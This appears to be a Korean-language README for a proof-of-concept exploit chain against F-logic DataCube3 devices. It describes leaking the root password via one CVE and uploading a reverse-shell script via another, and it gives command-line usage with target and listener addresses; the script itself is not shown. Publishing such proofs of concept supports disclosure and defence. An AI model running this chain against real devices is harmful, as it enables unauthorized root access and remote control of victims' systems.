
CVE-2024-25832를 위한 PoC 스크립트: DataCube3의 익스플로잇 체인 리버스 셸, 정보 노출(루트 비밀번호 유출) + 무제한 파일 업로드
이 저장소는 DataCube3 장치를 대상으로 하는 2단계 익스플로잇 체인의 개념 증명(PoC)을 제공합니다. CVE-2024-25830(부적절한 접근 제어)을 이용하여 루트 비밀번호를 추출하고, CVE-2024-25832(제한 없는 파일 업로드)를 이용하여 리버스 셸 스크립트를 배포합니다. 이 PoC는 블로그 게시물 "DataCube3 Vulnerability Report"의 상세 취약점 분석을 보완합니다.
모든 F-logic DataCube3 장치 버전 1.0.
# Usage: python datacube3.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python datacube3.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444

교육 목적으로만 사용하십시오.